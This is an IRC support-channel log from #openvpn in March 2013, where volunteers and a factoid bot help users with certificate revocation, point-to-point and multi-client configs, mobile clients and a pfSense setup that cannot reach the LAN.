08:39 < pekster> Yup. 
I also run OpenVPN on some embedded hardware applications too, so clock sync is critical to verify 08:39 < gitsu-sa> any hints? x_x 08:39 < gitsu-sa> i need to save the date somewhere 08:39 < gitsu-sa> and get it at start 08:40 < pekster> Not if you have no RTC. Since OpenVPN doesn't work without net access anyway, I solve the problem by testing the clock and if it's not "recent" (my hw sets itself to something like 2001, so I just test that it's later than 2013 or w/e current year is) I bounce the ntpd service 08:41 < pekster> I continue testing every few minutes until the clock is correct, so even if ntpd crashes after boot or something that "shouldn't" happen, it still eventually gets corrected afer a few minutes 08:44 < gitsu-sa> http://packages.debian.org/wheezy/fake-hwclock 08:45 < gitsu-sa> this looks good 08:45 <@vpnHelper> Title: Debian -- Details of package fake-hwclock in wheezy (at packages.debian.org) 08:47 < gitsu-sa> it start very soon 08:52 < gitsu-sa> well, thank you pekster!!! C: 08:52 < gitsu-sa> i will never get that problem again. 08:54 < pekster> Sure. Keep in mind that solution can still drift up to the downtime between boots, so you still want to take measures to insure NTP properly sets your clock or you'll slowly vary from real-world time 08:55 < gitsu-sa> i sync the clock every day with cron 08:56 -!- AsadH is now known as zz_AsadH 09:01 <+EugeneKay> Buy hardware with a working clock. 
09:24 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:25 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 09:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 09:30 -!- marksaitis [~marksaiti@62.49.62.180] has quit [Ping timeout: 245 seconds] 09:34 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:39 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 248 seconds] 09:39 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn --- Log closed Mon Mar 04 10:01:01 2013 --- Log opened Mon Mar 04 10:01:14 2013 10:01 -!- ecrist_ [~ecrist@token-black.secure-computing.net] has joined #openvpn 10:01 -!- Irssi: #openvpn: Total of 178 nicks [8 ops, 0 halfops, 5 voices, 165 normal] 10:01 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Operation timed out] 10:01 < dropje> poor vpnHelper 10:01 -!- Irssi: Join to #openvpn was synced in 42 secs 10:02 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 10:02 -!- mode/#openvpn [+o vpnHelper] by ChanServ 10:02 -!- ecrist [~ecrist@freebsd/contributor/openvpn.community.support.ecrist] has quit [Ping timeout: 245 seconds] 10:02 < pekster> It disappeared yesterday as well on the wrong side of a netsplit when I was using it :\ 10:06 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 10:07 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 10:07 -!- mode/#openvpn [+o vpnHelper] by ChanServ 10:09 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:15 <+EugeneKay> !factoids 10:15 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 10:15 <+EugeneKay> Bookmark, enjoy 10:16 < pekster> Yea, I copy/pasted from it during the netsplit 10:17 -!- zz_AsadH is now known as AsadH 10:20 -!- xtz 
[xtz@DeathStar.Techn0.eu] has joined #openvpn 10:20 < xtz> hey guys 10:20 < xtz> I have a quick question 10:21 < xtz> in /keys/index.txt I got a db with all the certs Ive created 10:21 < xtz> how can I remove someone from there (besides text editor :P) 10:23 < pekster> xtz: If you've issued a cert, you want to revoke the key, not just delete it. The index.txt is just a flat db telling you what's been issued; the cert is still valid if you remove it from the index 10:23 < pekster> s/key/cert/ 10:23 < rob0> Furthermore, you shouldn't have your PKI on the server. Ideally you'd keep it elsewhere, not on a VPN-connected machine. 10:26 -!- You're now known as ecrist 10:26 -!- mode/#openvpn [+o ecrist] by ChanServ 10:49 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 10:49 < xtz> pekster: alright, how to remove the cert then? 10:50 < xtz> I mean, the cert itself (as a file) is removed already 10:50 < xtz> is there another db thats keeping record of these? 10:51 < pekster> The index.txt is just that - an index. You need the cert file on-disk on the PKI as that's used to perform the revocation 10:51 < pekster> If you deleted it, it's somewhat non-trivial to properly revoke the certificate, so ideally you have backups of this critical part of your infrastructure 10:52 < pekster> The correct way to revoke an issued certificate with Easy-RSA is to use the 'revoke-full' script and pass the cert filename (sans extension) 10:53 < pekster> Then take the CRL and apply it to your server 10:53 < pekster> !revoke 10:53 < pekster> !factoids search revoke 10:53 <@vpnHelper> No keys matched that query. 10:53 < pekster> !crl 10:53 <@vpnHelper> "crl" is (#1) --crl-verify A CRL (certificate revocation list) is used when a particular key is compromised but when the overall PKI is still intact. The only time when it would be necessary to rebuild the entire PKI from scratch would be if the root certificate key itself was compromised. 
or (#2) you can make use of CRL by using the revoke-full script in easy-rsa (packaged with openvpn) that 10:53 <@vpnHelper> will create the CRL file for you. ssl-admin will also build a crl for you 10:54 < xtz> okayyyy 10:54 < xtz> thanks a lot for the info :-) 10:59 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 10:59 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 10:59 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 10:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 10:59 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 10:59 < vaillor> hi guys 10:59 < vaillor> i have configured my server in this way: 10:59 < vaillor> remote 87.20.100.100 10:59 < vaillor> ifconfig 10.3.0.1 255.255.255.0 10:59 < vaillor> secret key.txt 10:59 < vaillor> is it good? 11:01 < pekster> Without any form of context or your goals, I can definitively says "Maybe." 11:01 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 11:02 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:04 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 252 seconds] 11:05 -!- AsadH is now known as zz_AsadH 11:06 < rob0> I can definitively say that when using --secret you are not using a "server". :) That's p2p mode. 11:08 < vaillor> pekster, it's the sample.ovpn configuration file 11:12 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 11:12 < pekster> Assuming the key exists in the cwd, that config should technically launch. 
You really shouldn't use peer with an IP of 255.255.255.0, but again, it'll technically work 11:12 < pekster> If it's "good" depends on your setup and needs; no context from you means I can't help there 11:13 < vaillor> i need to connect point to point 11:13 < vaillor> my smartphone 11:13 < vaillor> to my pc 11:13 < pekster> Why are you using 255.255.255.0 as the remote PtP IP then? 11:13 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 255 seconds] 11:14 < vaillor> i don't know, i've seen my host-only intefrace virtualbox who connects my guest vm to my host 11:14 < vaillor> they are point-to-point 11:14 < vaillor> so i copied configuration 11:14 < vaillor> that is 255.255.255.0 11:16 < pekster> That's a netmask. When used as an IP it falls in the "reserved for future use" so-called "Class E" IP space thath you shouldn't be using 11:16 < pekster> So, don't use such a silly PtP address. I'm pretty sure virtualbox is assinging your VM on a virtual subnet, not a PtP interface 11:17 < vaillor> pekster, can you help me to configure better? 11:18 < pekster> Mirror the IP opposite what your other OpenVPN endpoint is using 11:18 < pekster> If the remote end does 'ifconfig 10.3.0.2 10.3.0.1' then the local one should use 'ifconfig 10.3.0.1.10.3.0.2' 11:18 < pekster> You can use any IPs you want for a PtP peering, although they are generally by convention placed in the same logical network segment you've reserved 11:21 < vaillor> pekster, so, on the server side i use 10.3.0.2 11:22 < vaillor> on the client side i use 10.3.0.1 ? 11:22 < pekster> You should reverse them. Technically you can make up "whatever IPs" you want, but it's really confusing if the ends to mirror/match each other 11:22 < vaillor> in the remoge line 11:22 < vaillor> "remote" 11:23 < vaillor> which ip do i need to use? 11:23 < pekster> That's your remote endpoint. As defined in --remote in the manpage 11:23 < vaillor> remote real ip? 11:23 < pekster> I haven't a clue. 
What host do you intend to connect to? Or if this is the OpenVPN "server" (the endpoint waiting for a connection) you don't specify any remote line
11:24 -!- sh_t [~sht@176.222.238.158] has joined #openvpn
11:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
11:30 < vaillor> pekster
11:30 < vaillor> 87.20.100.100
11:30 < vaillor> it's the host real ip
11:31 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:31 -!- mikkel [~mikkel@80.71.132.15] has joined #openvpn
11:31 < vaillor> is the server
11:31 < pekster> Not the local host's IP. Remote is used to define the *remote* end, ie: your other VPN peer
11:31 < pekster> If that's correct, then yes, that's fine
11:32 < vaillor> so, now what i need to do to set these information on my iphone?
11:33 < pekster> Connect it? The iphone makes a bad test platform since logs/errors are harder to hunt down
11:33 < pekster> You're better off getting a working config somewhere else and importing it to the iphone
11:33 < pekster> Then if something doesn't work, you get logs without having to jump through hoops
11:34 < vaillor> ok, but never mind, i shouldn't get errors
11:36 < vaillor> so only these 3 line i need to config?
11:39 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
11:40 < xtz> failed to update database
11:40 < xtz> TXT_DB error number 2
11:40 < xtz> grrrrr
11:41 < pekster> You messed up your serial somehow; that error is an "index clash"
11:42 < pekster> http://www.mail-archive.com/openssl-dev@openssl.org/msg15628.html
11:42 <@vpnHelper> Title: [openssl.org #502] TXT_DB error number 2 (at www.mail-archive.com)
11:42 < xtz> already googled it and found my err
11:42 < xtz> forgot to source vars before issuing another cert
11:42 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds]
11:45 < vaillor> pekster, is there a way to specify a port?
11:47 < pekster> After the remote IP, or via --port
11:47 < pekster> See --remote and --port in the manpage for details
11:48 < vaillor> ok
11:48 < vaillor> so, i prepared a configuration file to export on the iphone
11:48 < vaillor> how to export also the key?
11:50 < pekster> copy it to the cwd you'll call the program from, or put it inline (which I believe is easier on the iphone.) I don't use/have an iphone so I can't help you there
11:50 < pekster> !inline
11:50 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
11:52 < tabakhase> remind me, what was "wrong" in allowing multiple connections for the same cert? (apart from ensuring that someone can't just give 'his key to a new user')
11:52 < tabakhase> vaillor using openvpn from cydia?
11:52 < vaillor> no
11:53 < tabakhase> then "not" afaik... openvpn isn't supported by stock iOS
11:53 < pekster> Yes it is
11:53 < pekster> !iphone
11:53 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store or (#3) https://community.openvpn.net/openvpn/wiki/IOSinline
11:53 < tabakhase> (using the thing from cydia you form a zip with certs+config and just upload it "to that program" using itunes)
11:54 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
11:54 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has quit [Ping timeout: 252 seconds]
11:55 < tabakhase> uhhh - what am i reading there? no JB required anymore?
11:55 < tabakhase> is that then not supporting the gw-redirect or did they manage to make that all happen now?
11:55 < pekster> tabakhase, it's bad practice to share any form of a private key, be it X509 keypairs for openvpn, ssh private keys, etc. You can't tell "who" connected based on CN, nor can you revoke just one of their certs for access
11:55 < pekster> Should be fully supported minus tap, I believe
11:56 < pekster> !android
11:56 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the
11:56 <@vpnHelper> market
11:56 < pekster> Yes, so I think >=JB for the android APIs to work without root
11:57 < tabakhase> hm, i can just remember it was "the" reason to JB my ipad2... but that's been a year ago or so...
12:01 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn
12:03 < pekster> Oh, jailbreak: JB to mean means Jelly Bean for Android...
12:03 < pekster> to me*
12:03 < vaillor> pekster, how do i identify the client and server?
12:03 < vaillor> the config is the same
12:04 < pekster> You need to read the howto a bit closer. http://openvpn.net/index.php/open-source/documentation/miscellaneous/78-static-key-mini-howto.html
12:04 <@vpnHelper> Title: Static Key Mini-HOWTO (at openvpn.net)
12:04 -!- marksaitis [~marksaiti@86.28.107.165] has joined #openvpn
12:06 < vaillor> so, another question is: what difference is there between: openvpn-install-2.3.0-I004-i686.exe
12:06 < vaillor> and tunnelinstall.msi ?
12:06 < vaillor> oh sorry
12:06 < vaillor> privatetunnel.msi
12:07 <+EugeneKay> PrivateTunnel is the proprietary version
12:07 <+EugeneKay> !download
12:07 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
12:07 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
12:11 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-safvatvxnhzshede] has quit []
12:14 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
12:17 -!- master_o1_master [~master_of@p4FF249DB.dip.t-dialin.net] has joined #openvpn
12:19 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-oezetszxfobedvxh] has joined #openvpn
12:20 -!- master_of_master [~master_of@p4FF2449F.dip.t-dialin.net] has quit [Ping timeout: 256 seconds]
12:20 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
12:31 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn
12:37 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [Ping timeout: 252 seconds]
12:42 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
12:47 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
13:02 -!- MFSOT_ [~MFSOT@226.sub-70-215-20.myvzw.com] has joined #openvpn
13:03 < MFSOT_> Hello all - I'm having trouble connecting to my LAN via pfSense openVPN server, no one over there seems to be able to figure this out, I have to think it's a simplistic answer when it's figured out.
Basically I'm connected via client, firewall is wide open and I can't access LAN
13:04 <@ecrist> !configs
13:04 < MFSOT_> I can ping the gateway (pfSense) but can't ping any members of the LAN
13:04 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
13:04 <@ecrist> !diagram
13:04 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle
13:04 <@ecrist> !logs
13:04 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
13:04 <@ecrist> !goal
13:04 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
13:08 < MFSOT_> http://pastebin.com/Dwf1TPGF
13:08 < MFSOT_> windows client log
13:09 < MFSOT_> win 7 pro client is 2.3
13:12 -!- marksaitis [~marksaiti@86.28.107.165] has quit [Ping timeout: 245 seconds]
13:12 <@ecrist> waiting for the rest of it
13:13 < MFSOT_> ecrist obtaining it
13:13 < MFSOT_> I'd love to give you the config off the pfsense box but don't know of any way of getting it to this machine
13:14 < MFSOT_> so I'll take some screen shots
13:15 < MFSOT_> I'm on pfSense 2.01
13:15 < rob0> !pfsense
13:16 <@vpnHelper> "pfsense" is dont use the web gui for configuring openvpn, you need to understand the
config and logfiles
13:16 < rob0> um, it's there somewhere
13:16 <@ecrist> pfsense keeps it as a config file somewhere, trying to remember where scott said it was
13:16 <@ecrist> /var/etc/openvpn/
13:17 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has left #openvpn []
13:20 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has joined #openvpn
13:24 < MFSOT_> ecrist, I'll try to find it in shell and copy it to a usb, just not quite sure how I'll accomplish that
13:26 <@ecrist> the the file and copy/paste to pastebin
13:27 < MFSOT_> i get that, but pfsense is just a shell unless I'm on the gui so I need to take it off the pfsense box and get it to this box that I'm talking to you on
13:27 <@ecrist> no
13:27 <@ecrist> open a shell, type cat where is the path and filename of the config
13:28 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 245 seconds]
13:28 <@ecrist> then use your mouse, select the text, and paste it to pastebin
13:30 < MFSOT_> it's a different box, are you saying I can paste to pastebin via CLI on pfSense? mouse doesn't work in CLI on pfSense... I'll just type it out and paste it
13:31 <@ecrist> you can't use ssh?
13:37 < MFSOT_> I've got nothing ecrist, I appreciate your help - I don't know a way to copy the text in CLI of pfSense as I can't use a mouse and can't get off of the current line my cursor is on
13:38 < MFSOT_> best I can do is post some images at imgur of my config, but if that's not enough I understand
13:38 < pekster> textual terminal select is provided on almost any terminal, from xterm under Unix/Linux to putty under Windows. You can't ssh into your pfsense box with such a standard terminal?
13:39 < pekster> Your life will be a lot easier if you do that first, and then attempt to configure your OS after you have a proper terminal interface to it
13:40 <@ecrist> MFSOT_: email it to yourself
13:41 < MFSOT_> I'll putty in
13:41 <@ecrist> damn you
13:41 <@ecrist> putty is ssh
13:41 <@ecrist> you can use the mouse in putty to copy text
13:41 * ecrist gives up
13:42 < pekster> Well now, I also use RS-232 via putty when I need to jack into a switch or serial boot console ;)
13:42 <@ecrist> you can still use the mouse to copy text.
13:43 <@ecrist> :P
13:43 < pekster> When the console finally sends it, yes :D
13:48 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has joined #openvpn
13:51 -!- MFSOT_ [~MFSOT@226.sub-70-215-20.myvzw.com] has quit [Ping timeout: 250 seconds]
13:55 < neilhwatson> What is the mechanism used on this channel to refer to documentation via !?
13:55 -!- Orbi [~opera@109.129.1.99] has joined #openvpn
13:57 < pekster> neilhwatson: The local bot is connected just like any other user and runs code to listen for commands and reply to them
13:58 < pekster> Pretty common on IRC really
13:58 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza]
13:58 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
14:02 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection]
14:04 -!- pelle2 [~palle@178-132-74-156.cust.azirevpn.net] has joined #openvpn
14:05 < pelle2> is it possible to access a LAN behind an openvpn server if the router on the lan is using the same IP as a machine on the LAN from where i'm connecting?
14:05 < pelle2> or will there be a conflict regardless how i config things
14:05 < pelle2> can i config the server to somehow go around this
14:07 < pekster> You can add a more-specific route (say a /32 IPv4 route) on the client to override the link-local route, but it's best to fix your issue properly by avoiding conflicting network ranges
14:09 < pekster> And of course that breaks if you actually need to reach the local version of that IP (for your router, DNS, etc)
14:09 < pekster> What's stopping you from not overlapping network ranges? 10/8 is a nice and big place...
14:10 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal]
14:12 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
14:13 < MFSOT> http://pastebin.com/XiGLmlfL = client http://pastebin.com/Dwf1TPGF = client log http://pastebin.com/iBp6uWRm = server config
14:14 < MFSOT> GOAL is to be able to vpn into our LAN and access file server
14:14 < MFSOT> we don't need a diagram of our network it's internet>pfsense/openVPN>LAN
14:15 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
14:17 -!- Devastator [~devas@177.18.198.56] has joined #openvpn
14:20 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
14:21 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer]
14:24 < pelle2> pekster: i will have to change the ip for my LAN subnet then, dont know what that will do to all my rules and NATs in pfsense (router)
14:24 < pelle2> but i guess that would be the best alternative
14:28 < pekster> MFSOT: Your server is operating in multi-client mode with net30 topology but you've declared a PtP IP on line 23 of the client config, which you don't want. You don't need the route on line 24 as the server pushes it. No idea why you've specified "lport 0" on line 20 either; port "0" tends to cause problems, assuming it works at all.
Maybe you wanted 'nobind' instead? The local directive on line 17 matches the one used by ...
14:28 < pekster> ... the server, which is invalid unless both client & server openvpn instances are running on the same box
14:29 < pekster> MFSOT: I'd start over with the official howto, because there's a lot wrong with your setup:
14:29 < pekster> !howto
14:29 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
14:30 < MFSOT> pekster - this is new to me - set it up via GUI
14:30 < MFSOT> I want multi clients
14:30 < pekster> Yea, don't do that. Read the official howto, because we don't support poorly designed frontends here
14:30 < MFSOT> ok
14:31 < MFSOT> so I can set it up behind the scenes and import it to pfSense?
14:31 < pekster> Probably; I don't use pfsense, so I don't know how its init system is designed
14:31 < pekster> You can likely just replace the config file with your own though
14:36 < MFSOT> thank you for your help
14:37 < MFSOT> same to ecrist
14:38 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 248 seconds]
14:42 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: leaving]
14:44 -!- mete [~mete@mete.shell.la] has joined #openvpn
14:50 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has quit [Ping timeout: 240 seconds]
14:53 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn
14:56 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving]
15:17 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 264 seconds]
15:21 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
15:24 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 276 seconds]
15:37 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn
15:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error:
Connection reset by peer]
15:46 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
15:49 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
15:52 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has quit [Read error: Connection reset by peer]
15:52 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has joined #openvpn
15:54 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
15:54 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
15:55 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds]
16:02 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has quit [Ping timeout: 256 seconds]
16:05 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]]
16:08 < vaillor> how to configure openvpn as a server?
16:09 < pekster> The howto is the right place to start with that broad of a question. In the abstract, you configure it without a 'remote' directive and it'll start up and wait for connections, thus acting as a "server"
16:09 < pekster> !howto
16:09 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
16:10 < vaillor> thank you
16:24 -!- Orbi [~opera@109.129.1.99] has left #openvpn []
16:30 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
17:19 -!- vect0rx [vectorx@havok.org] has joined #openvpn
17:22 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn
17:30 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn
17:53 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Ping timeout: 250 seconds]
17:58 < vaillor> do i need to create certificates also on the clients?
17:59 < pekster> Yes, unless you want to use --user-auth-pass-verify by itself to authenticate users
18:00 < vaillor> in this way i need to set pass on the server?
18:00 < pekster> That should be: --auth-user=pass-verify
18:00 < pekster> With a dash. Typing fail
18:01 < pekster> That directive takes a script or executable command to perform the authentication
18:01 < pekster> See the manpage for details
18:02 < pekster> Combined with --client-cert-not-required you just need the ca.crt (so the client can verify the server.) The server would then require a user/pass and verify it according to the script. This is less secure, but sometimes more convenient
18:02 < vaillor> so, when i import config to a client, i imported also key
18:02 < vaillor> why do i need to generate another key?
18:03 < pekster> You cannot (or should not, at least) use the server's keypair for the client
18:03 < pekster> That's all measures of wrong
18:03 < pekster> You are trying to set up X509 for multi-client server support, right?
18:03 < vaillor> i haven't understood the difference between client and server in vpn configuration
18:04 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
18:05 < pekster> When used in 'mode server', you have a "server" that listens for incoming client connections, and has a cert signed with special "server" attributes. Clients get unique keypairs of their own, signed with special "client" attributes.
For a secure environment, clients should check that the cert they get is a correctly issued "server" cer
18:05 < pekster> !mitm
18:05 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config
18:06 < vaillor> ok, so, if i need to establish start the vpn connection from server to client, i can't
18:06 < vaillor> but i need at first to initiate it from client to server
18:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds]
18:07 < pekster> Right. By definition the server listens for connections
18:08 < pekster> How else do you expect it to support multiple clients?
18:08 < vaillor> in a normal lan network there isn't a "server"
18:08 < vaillor> but is there only a switch that connects all hosts
18:09 < pekster> The server is the end that listens for connections. The client initiates the connection
18:09 < pekster> In p2p mode there is no clear role of "server" vs "client", but in multi-client mode ('mode server' in openvpn config terms) the distinction is explicit
18:10 < pekster> One end must take the TLS Server role for the TLS handshake negotiation, and this end also listens for inbound connections on a defined port
18:10 < vaillor> in p2p mode both side are client and server at the same time?
18:10 < pekster> In p2p it's better to think of them as both "peers"
18:11 < pekster> Usually one end still listens and the other has the remote directive, but they could both have remote directives so either end tries to re-open a connection if they have data to send and the connection isn't considered established yet
18:11 < vaillor> so, in this way, i can initiate the connection from both sides?
18:11 < pekster> Sort of.
UDP has no notion of "initiating" a connection - it's just a stream of packets with no defined start or end
18:12 < pekster> Firewalls often care, but the UDP protocol doesn't
18:12 < pekster> If some of the basics are confusing, here's a more basic guide to understanding how TCP/IP works that might provide background reading:
18:12 < pekster> !tcpip
18:13 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
18:13 < vaillor> pekster, and how can i specify to use it in client-server mode or in p2p mode?
18:13 < pekster> The --mode directive
18:14 < pekster> Using any of --server, --server-bridge, or --client directives imply mode server or client as well
18:14 < pekster> Each is further defined in the manpage
18:41 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
18:41 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
18:41 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
18:41 -!- mode/#openvpn [+o krzee] by ChanServ
18:51 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn
18:56 -!- ravel_exe [~ravel_exe@175.136.85.24] has joined #openvpn
18:57 < vaillor> pekster, how do i need to put configuration file and key file in openvpn over debian?
18:57 < pekster> Same as any other standard distro; drop the config in /etc/openvpn/ named whatever.conf and start the initscript
18:58 < pekster> IIRC debian's initscript just blindly starts any *.conf there; maybe /etc/default/openvpn can tune that, but it's been a while since I ran openvpn+debian so you'd want to check that
18:59 -!- ravel_exe [~ravel_exe@175.136.85.24] has quit [Remote host closed the connection]
19:01 < vaillor> so i only copy .conf in /etc/openvpn
19:01 < pekster> Probably your keys & certs too, unless they're all inline
19:22 -!- p3rror [~mezgani@41.249.23.19] has quit [Read error: Connection reset by peer]
19:24 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn
19:26 -!- raidz is now known as raidz_away
19:27 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Quit: Leaving]
19:31 -!- pinion [~pinion@unaffiliated/pinion] has quit [Quit: leaving]
19:38 -!- oc80z is now known as [oc80z]
